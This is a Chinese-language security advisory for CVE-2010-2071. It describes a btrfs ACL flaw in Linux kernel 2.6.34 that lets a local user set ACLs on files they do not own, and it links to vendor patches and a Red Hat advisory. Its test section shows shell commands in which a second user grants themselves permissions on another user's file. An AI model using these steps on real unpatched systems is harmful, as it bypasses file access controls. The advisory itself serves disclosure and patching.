发布日期：2010-06-14
更新日期：2010-07-09

受影响系统：

Linux kernel 2.6.34

描述：

---

BUGTRAQ  ID: 41467
CVE ID: CVE-2010-2071

Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux Kernel的btrfs实现中fs/btrfs/acl.c文件中的btrfs_xattr_set_acl函数在设置ACL之前没有检查文件的所有权，本地用户可以通过设置任意ACL绕过文件权限限制。

<*来源：Shi Weihua
  
  链接：https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=595579
        http://lkml.org/lkml/2010/5/17/544
        https://www.redhat.com/support/errata/RHSA-2010-0504.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

# su user1
# cd btrfs-part/
# touch aaa
# getfacl aaa
  # file: aaa
  # owner: user1
  # group: user1
  user::rw-
  group::rw-
  other::r--
# su user2
# cd btrfs-part/
# setfacl -m u::rwx aaa
# getfacl aaa
  # file: aaa
  # owner: user1
  # group: user1
  user::rwx           <- successed to setfacl
  group::rw-
  other::r--

建议：

---

厂商补丁：

Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://git.kernel.org/linus/7df0e0397b9a18358573274db9fdab991941062f

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0504-01）以及相应补丁:
RHSA-2010:0504-01：Important: kernel security and bug fix update
链接：https://www.redhat.com/support/errata/RHSA-2010-0504.html

浏览次数：2259
严重程度：0（网友投票）